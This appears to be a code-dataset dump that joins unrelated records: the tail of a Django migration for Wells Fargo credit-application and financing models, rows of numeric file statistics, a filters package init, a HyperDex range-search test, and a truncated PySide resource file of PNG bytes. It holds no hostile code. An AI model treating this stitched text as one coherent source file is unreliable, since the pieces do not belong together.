"joint_address_postcode",
models.CharField(max_length=10, verbose_name="Postcode"),
),
(
"joint_employer_name",
models.CharField(max_length=30, verbose_name="Employer Name"),
),
(
"joint_time_at_employer",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"joint_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"joint_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"joint_occupation",
models.CharField(max_length=24, verbose_name="Occupation"),
),
(
"joint_photo_id_type",
models.CharField(
choices=[
("OA", "Old Age Security Card"),
("DL", "Driver’s License"),
("PI", "Provincial ID"),
("PA", "Canadian Passport"),
("CN", "Certificate of Citizenship or Naturalization"),
("IS", "Certificate of Indian Status"),
("CC", "Canadian Citizen Form 1000 or 1442"),
],
max_length=3,
verbose_name="Photo ID Type",
),
),
(
"joint_photo_id_number",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Photo ID Number",
),
),
(
"joint_drivers_license_province",
models.CharField(
max_length=2,
blank=True,
null=True,
verbose_name="Driver’s License Province",
),
),
(
"joint_photo_id_expiration",
models.DateField(verbose_name="Photo ID Expiration Date"),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="ca_joint_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "CA Joint Credit Application",
"verbose_name_plural": "CA Joint Credit Applications",
"abstract": False,
},
),
migrations.CreateModel(
name="FinancingPlan",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"plan_number",
models.PositiveIntegerField(
unique=True,
validators=[
django.core.validators.MinValueValidator(1001),
django.core.validators.MaxValueValidator(9999),
],
verbose_name="Plan Number",
),
),
(
"description",
models.TextField(
blank=True, default="", verbose_name="Description"
),
),
(
"apr",
models.DecimalField(
decimal_places=2,
default="0.00",
max_digits=5,
validators=[
django.core.validators.MinValueValidator(Decimal("0.00")),
django.core.validators.MaxValueValidator(Decimal("100.00")),
],
verbose_name="Annual percentage rate (0.0 – 100.0)",
),
),
(
"term_months",
models.PositiveSmallIntegerField(
default=12, verbose_name="Term Length (months)"
),
),
(
"is_default_plan",
models.BooleanField(default=False, verbose_name="Is Default Plan?"),
),
(
"allow_credit_application",
models.BooleanField(
default=True,
verbose_name="Allow new credit applications when user is eligible for this plan?",
),
),
],
options={
"ordering": ("plan_number",),
},
),
migrations.CreateModel(
name="FinancingPlanBenefit",
fields=[
(
"benefit_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="offer.Benefit",
),
),
("group_name", models.CharField(max_length=200, verbose_name="Name")),
("plans", models.ManyToManyField(to="wellsfargo.FinancingPlan")),
],
options={
"verbose_name": "Benefit",
"verbose_name_plural": "Benefits",
"abstract": False,
},
bases=("offer.benefit",),
),
migrations.CreateModel(
name="TransferMetadata",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"last4_account_number",
models.CharField(
max_length=4, verbose_name="Last 4 digits of account number"
),
),
("encrypted_account_number", models.BinaryField(null=True)),
("merchant_reference", models.CharField(max_length=128, null=True)),
("amount", models.DecimalField(decimal_places=2, max_digits=12)),
(
"type_code",
models.CharField(
choices=[
("5", "Authorization for Future Charge"),
("7", "Cancel Existing Authorization"),
("4", "Return or Credit"),
("9", "Time-out Reversal for Return or Credit"),
("VS", "Void Sale"),
("VR", "Void Return"),
],
max_length=2,
verbose_name="Transaction Type",
),
),
(
"ticket_number",
models.CharField(
blank=True,
max_length=12,
null=True,
verbose_name="Ticket Number",
),
),
(
"auth_number",
models.CharField(
blank=True,
default="000000",
max_length=6,
null=True,
verbose_name="Authorization Number",
),
),
(
"status",
models.CharField(
choices=[
(
"A0",
"Transaction not approved or declined. For time-out reversal and void transactions, match was found but was already funded.",
),
(
"A1",
"Approved. For time-out reversal and void transactions, match was found and processed.",
),
(
"A2",
"Time-out reversal or void approved, but no matching transaction was found.",
),
(
"A3",
"Time-out reversal or void approved, but matched duplicate transactions.",
),
],
max_length=2,
verbose_name="Status",
),
),
("message", models.TextField(verbose_name="Message")),
("disclosure", models.TextField(verbose_name="Disclosure")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"financing_plan",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="wellsfargo.FinancingPlan",
verbose_name="Plan Number",
),
),
(
"user",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="wfrs_transfers",
to=settings.AUTH_USER_MODEL,
verbose_name="Requesting User",
),
),
],
),
migrations.CreateModel(
name="USCreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"main_ssn",
wellsfargo.core.fields.USSocialSecurityNumberField(
max_length=11, verbose_name="Social Security Number"
),
),
(
"main_address_state",
localflavor.us.models.USStateField(
max_length=2, verbose_name="State"
),
),
(
"main_address_postcode",
localflavor.us.models.USZipCodeField(
max_length=10, verbose_name="Postcode"
),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
blank=True,
choices=[("R", "Rent"), ("O", "Own"), ("OT", "Other")],
max_length=3,
null=True,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(
blank=True,
max_length=30,
null=True,
verbose_name="Employer Name",
),
),
(
"main_time_at_employer",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(
blank=True, max_length=24, null=True, verbose_name="Occupation"
),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="us_individual_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "US Individual Credit Application",
"verbose_name_plural": "US Individual Credit Applications",
"abstract": False,
},
),
migrations.CreateModel(
name="USJointCreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"joint_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"joint_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"joint_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"joint_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"joint_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"joint_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"joint_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"joint_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"main_ssn",
wellsfargo.core.fields.USSocialSecurityNumberField(
max_length=11, verbose_name="Social Security Number"
),
),
(
"main_address_state",
localflavor.us.models.USStateField(
max_length=2, verbose_name="State"
),
),
(
"main_address_postcode",
localflavor.us.models.USZipCodeField(
max_length=10, verbose_name="Postcode"
),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
blank=True,
choices=[("R", "Rent"), ("O", "Own"), ("OT", "Other")],
max_length=3,
null=True,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(
blank=True,
max_length=30,
null=True,
verbose_name="Employer Name",
),
),
(
"main_time_at_employer",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(
blank=True, max_length=24, null=True, verbose_name="Occupation"
),
),
(
"joint_ssn",
wellsfargo.core.fields.USSocialSecurityNumberField(
max_length=11, verbose_name="Social Security Number"
),
),
(
"joint_address_state",
localflavor.us.models.USStateField(
max_length=2, verbose_name="State"
),
),
(
"joint_address_postcode",
localflavor.us.models.USZipCodeField(
max_length=10, verbose_name="Postcode"
),
),
(
"joint_employer_name",
models.CharField(
blank=True,
max_length=30,
null=True,
verbose_name="Employer Name",
),
),
(
"joint_time_at_employer",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"joint_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"joint_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"joint_occupation",
models.CharField(
blank=True, max_length=24, null=True, verbose_name="Occupation"
),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="us_joint_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "US Joint Credit Application",
"verbose_name_plural": "US Joint Credit Applications",
"abstract": False,
},
),
]
| 39.048766 | 166 | 0.361249 | 4,082 | 66,461 | 5.686428 | 0.081088 | 0.099991 | 0.073238 | 0.057901 | 0.888635 | 0.877133 | 0.862959 | 0.853007 | 0.845554 | 0.838359 | 0 | 0.017892 | 0.55598 | 66,461 | 1,701 | 167 | 39.071723 | 0.768655 | 0.001023 | 0 | 0.804489 | 1 | 0.005316 | 0.140006 | 0.012095 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.002953 | 0.005316 | 0 | 0.007679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
85718d7aeee538dfead7b6f1cb20d5acdbddfc1f | 36 | py | Python | software/filters/src/filters/__init__.py | iorodeo/water_channel_ros | fefaf1c58f6b386da136cfdd8e39362c8843c7c8 | [
"Apache-2.0"
] | null | null | null | software/filters/src/filters/__init__.py | iorodeo/water_channel_ros | fefaf1c58f6b386da136cfdd8e39362c8843c7c8 | [
"Apache-2.0"
] | null | null | null | software/filters/src/filters/__init__.py | iorodeo/water_channel_ros | fefaf1c58f6b386da136cfdd8e39362c8843c7c8 | [
"Apache-2.0"
] | null | null | null | import kalman_filter
import lowpass
| 12 | 20 | 0.888889 | 5 | 36 | 6.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 2 | 21 | 18 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
74f90a1a7793c8ac0ab1a3f4c79401454970dfe4 | 1,778 | py | Python | test/python/RangeSearchInt.py | cnangel/HyperDex | b272e85b08d232993baf6105a4beba833deadfe3 | [
"BSD-3-Clause"
] | 1 | 2016-08-10T07:53:58.000Z | 2016-08-10T07:53:58.000Z | test/python/RangeSearchInt.py | cnangel/HyperDex | b272e85b08d232993baf6105a4beba833deadfe3 | [
"BSD-3-Clause"
] | null | null | null | test/python/RangeSearchInt.py | cnangel/HyperDex | b272e85b08d232993baf6105a4beba833deadfe3 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2
import sys
import hyperdex.client
from hyperdex.client import LessEqual, GreaterEqual, LessThan, GreaterThan, Range, Regex, LengthEquals, LengthLessEqual, LengthGreaterEqual
c = hyperdex.client.Client(sys.argv[1], int(sys.argv[2]))
def to_objectset(xs):
return set([frozenset(x.items()) for x in xs])
assert c.put('kv', -2, {'v': -2}) == True
assert c.put('kv', -1, {'v': -1}) == True
assert c.put('kv', 0, {'v': 0}) == True
assert c.put('kv', 1, {'v': 1}) == True
assert c.put('kv', 2, {'v': 2}) == True
assert to_objectset(c.search('kv', {'k': LessEqual(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}, {'k': 0, 'v': 0}])
assert to_objectset(c.search('kv', {'v': LessEqual(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}, {'k': 0, 'v': 0}])
assert to_objectset(c.search('kv', {'k': GreaterEqual(0)})) == to_objectset([{'k': 0, 'v': 0}, {'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'v': GreaterEqual(0)})) == to_objectset([{'k': 0, 'v': 0}, {'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'k': LessThan(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}])
assert to_objectset(c.search('kv', {'v': LessThan(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}])
assert to_objectset(c.search('kv', {'k': GreaterThan(0)})) == to_objectset([{'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'v': GreaterThan(0)})) == to_objectset([{'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'k': Range(-1, 1)})) == to_objectset([{'k': -1, 'v': -1}, {'k': 0, 'v': 0}, {'k': 1, 'v': 1}])
assert to_objectset(c.search('kv', {'v': Range(-1, 1)})) == to_objectset([{'k': -1, 'v': -1}, {'k': 0, 'v': 0}, {'k': 1, 'v': 1}])
| 77.304348 | 139 | 0.536558 | 302 | 1,778 | 3.089404 | 0.139073 | 0.247588 | 0.045016 | 0.051447 | 0.726688 | 0.726688 | 0.726688 | 0.700965 | 0.700965 | 0.670954 | 0 | 0.049581 | 0.126547 | 1,778 | 22 | 140 | 80.818182 | 0.551191 | 0.011811 | 0 | 0 | 0 | 0 | 0.055239 | 0 | 0 | 0 | 0 | 0 | 0.714286 | 1 | 0.047619 | false | 0 | 0.142857 | 0.047619 | 0.238095 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
743bacd184ede389d7a914b027cde11029d09ae8 | 7,978 | py | Python | mapclientplugins/pointwiserigidregistrationstep/resources_rc.py | jtpils/pointwiserigidregistrationstep | 1f09faf62d881bacbe3c271be75d0522352f8f6e | [
"Apache-2.0"
] | 1 | 2019-06-24T17:55:51.000Z | 2019-06-24T17:55:51.000Z | mapclientplugins/pointwiserigidregistrationstep/resources_rc.py | jtpils/pointwiserigidregistrationstep | 1f09faf62d881bacbe3c271be75d0522352f8f6e | [
"Apache-2.0"
] | null | null | null | mapclientplugins/pointwiserigidregistrationstep/resources_rc.py | jtpils/pointwiserigidregistrationstep | 1f09faf62d881bacbe3c271be75d0522352f8f6e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Resource object code
#
# Created: Tue Jul 8 07:56:52 2014
# by: The Resource Compiler for PySide (Qt v4.8.4)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x08\xea\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00@\x00\x00\x00@\x08\x06\x00\x00\x00\xaaiq\xde\x00\x00\x00\x04sBIT\x08\x08\x08\x08|\x08d\x88\x00\x00\x00\x09pHYs\x00\x00\x0d\xd7\x00\x00\x0d\xd7\x01B(\x9bx\x00\x00\x00\x19tEXtSoftware\x00www.inkscape.org\x9b\xee<\x1a\x00\x00\x08gIDATx\x9c\xed\x9a\x7f\x8c\x5cU\x15\xc7?\xe7\xcd\xfe((\xb05\x11\x0b5q\x08U+\x08\x8c\xa2\x0b\xa5@\xe7\x05Z1$\xb0\x13\x8c\x7f\xf8\x87\xdd5\xc6?\xfcC\xb7\xf1\x0f\xf9\xc3d\x19\xf5\x0f\xff\xb2\xdd\x10\x821\x9a]H\x94\x180\xb3\x0dA\x22\x0b\xce\xd3\x02\x0b4\xa6\xafX\x97\xc6\x80\x1d\x22 \xa4\x22CT\xb6\xbb\xfb\xde\xfd\xfa\xc7\xbb\xab\xd3\xe9\xceR\xe9\xdb\x1d\xd4=\xc9d\xde\xb9\xf7\x9cs\xcf\xfb\xdes\xce\xbd\xf7\xbdg\x928S2\xb3M\xc0\xbc\xa47\xce\xd8\xd8\xbfm\xbe\x0f\xe8\x95\xf4Z\x8e6\xcf\x05\xce\x06\x8eKJ\x01\x90\x84\x07\xe1b\xe0)\xff\x9b\x01&\x80\xcfy'\xe8\xf4\xf3\x06\x05<\xb4\x92\x9c\x97\xbd\x14\xf8\x1ep\xcdi\xc8F\x99{+\xcb\xfd'?\xe0n\xef\xeb\xd6\xa5\xb6\xa0\x05\xa0\xb3\x81\xab\x80\x0b\x80\x83\xc0\xd5\xc0\xfd\xc0\x17\xdaP<\xc7\xcc\xac\xa5i\x1e\xa8\x00\xdfY\x06\xf1\xde6\xd9\x8f\x00\xdf\x04>\xb5\x8cl\x9f\x99\x9d\xd7y\xfe\xc0\xcc\x023{\xefJ2\x1d\xf4\xfa;v\xb6\xa0s\x19\x19:\x8fx~\xd0\xf3\x0f{\xfeV\xa0\xe1\xdb\xde\x02\xc6\x81\x008\x0b8\x01Ly\xb9\xbb<\x7f\x170\x07\x1c\x03n\x02\xae\x00\x16\xbc\xfe\xa2\x97\xb9\x16\xf8\x18\xf08\x90\xfa\xbe\xfb\xda#\x00\xe8\x05~\xe0\xed\x09x\x01\xb8\xc9\xf7}\xcb\xdb\xba\xce\xf3\x8f\x00s\xfe\xba\x1f\xf8>\xf0\x0f\xe09\xdfwR\x04,\x07\xc0,\xf0U\xe0a\xcf\x7f\x038\xdf\x1by\x11\xf8,\xf03\xdf\xf7\x15\xdaR\x00\xf8\xa1\xe7\x7fI\x96B\x8b\xc0\x83\xc09\xc0\xb7}\xdf\xdd\x1e\x94\x8d@\xec\xdbn'\x8b\xc0\xdb\x96\x01`\x8f\x97\xb9\x17\xb8\x19x\x05x\x138\x0f\xb8\xc3\xf7\xedXF\xef\x16\xdf\xf7\x13\xb2(}\xe3t\x00H=\xd2\x87\x80\xef\xfaAv\xfa\xbe;\xbd\xecU\x9e\x9f\x5c\x01\x80k=\xff\x22\xf0\x92\xbf\xae\xf8\xbe\xafy\xfe=\x9e?\xb2R\x0d KE\x01\x97y\xfe\xc7\x9e\xbf\xa6\x05\x80\xb2\xef\xfbM\x8b\xde\x8f|\xdf\xe5\x9e\xffy;\x00=\x9cJ\x8fI\xda\xd5\xda`fM\x7f\xb9\xb9\xed\xbfIgZ\xaa\xde\xf3\xfeF\x97\xae\x01\xfa\xfc\xff\x9co\xdblf\xfd\x92\xe6\xcd,\x90\xe4\xdal\xb5\x8e\xff\xbb\xb6\xf1\xdf\xf4\xd7\xe7\x9aY/Y\xaa-Q\xa3E\xefY\xe0\xc2S\xbc\xecT\x03\xdaf# \xcbS\x07<\xea\x07\x9e#\xab\xea\x9d\x22\xe0\xc3\x9e\xff\x03\xf0\xb2\xbf\x1e K\x89\xd7\xc9fx#\xd9\xaa \xb2H\xf9)p\xef2\x11p\xa5\x07\xeau\xe0W^~\x1a0\xe0\x12\xcf\xbfDV\x1b\xfe\xde\xa2w\x89\x1f\xef\xaf\xc0\x93\xc0\xdfX!\x02^\x03\xaa\xdeH;H\xce\xccn\x00\xbe\x04|\xd2\x1b\x9b\x94\xf4G\x8fz\xd5\xdf(d\xf9\xfe\x8aw\x16\xe0N\xb2\x22\x86\xa4\xa6\x99\x95\x80\xcf\x00\xe7\x02\x0b\x92n7\xb3\xc7\x81\x1b\xc9\x22\xe5!\xaf7\x09\xd4\xbd\xdeo\xcd\xec2\xe0\x8bd\xf5\xe8>?\xbe\x80Y3\xdbIV\xa4\x7f\x01|\x00\xf8\x90\xd7\x9b5\xb3\x8f\x92\xd5\xb4\xdf\x03\xc7\xc9V\xa0\xbf,\xdd\x9b\xe5\xb1\x11\xfao\xa6\xe0\xedE\xfe\xb7i\x1d\x80n;\xd0mZ\x07\xa0\x9b\x83\xbf\xf9\xe5\xeb\xba^\x81\xbb\x0a\x80\x92\xf6\xfd\xce\xdaSW\x01pI\xda\xcd\xe1\x815\xde\x07\x1c\xff\xfc`\xc9\x02\x95\x0d\xbbBP4\xa3,\x11\x01\xb1\x1c\x87\xd3B!\xdat\xdfLc\xcd\x1cb\x8d\x008~\xdb\x95\xc3\x98\x8da\x14OC<J\xb1\xea\xa6\xfb\x0fF\xab\xec\x16\xb0\xca\x00\x1c\xaf\x0c\x96T\xd0\x04Pjin\x02\x11\xc6a\xc4\x18F\xd5\xc4\x0eA\xf9$e1\xd5\xe7\x92\x91\x81\xda\xa1\x95\x0e\x5cgL\xabV\x03^\xad\x0c\x0e;\xe3\x90\x9c\x95\xe4\x0c9\x8b\x9c\x11\x9e\xff\xc0\xc1\x8do\xa5\xc9\x88K\x88\xe4\x0c\x97\x10\xbd\xff\x81\x83\xe1\xf9\x0f\x1c4'\x1b\x91\xb3\x86\x9c!\xd9\xd0\xbc\xf5\x1e{\xb92Xz\xfb\xd1\xde9\xadJ\x04\xbcZ\x19\x1c\x06\x9b\x000h\x8a\xa0r\x82\x13q\x1f}\xa3\x06\xbb\x8dSSA\x10\x1b\x1a\xdfT{f\xf2\xcf\x95\xabG\x0d\xed\xf5\xedM\x87\xc2\xcd\xb5g\xe2\xdc\x1de\x15\x22\xe0\xe5\xca`\xc9)\x98p2\x9c,\x9ec\xe1\x22\xa5n\xa0O\xfd\xc7\x90}\xdd9\x9b\x82 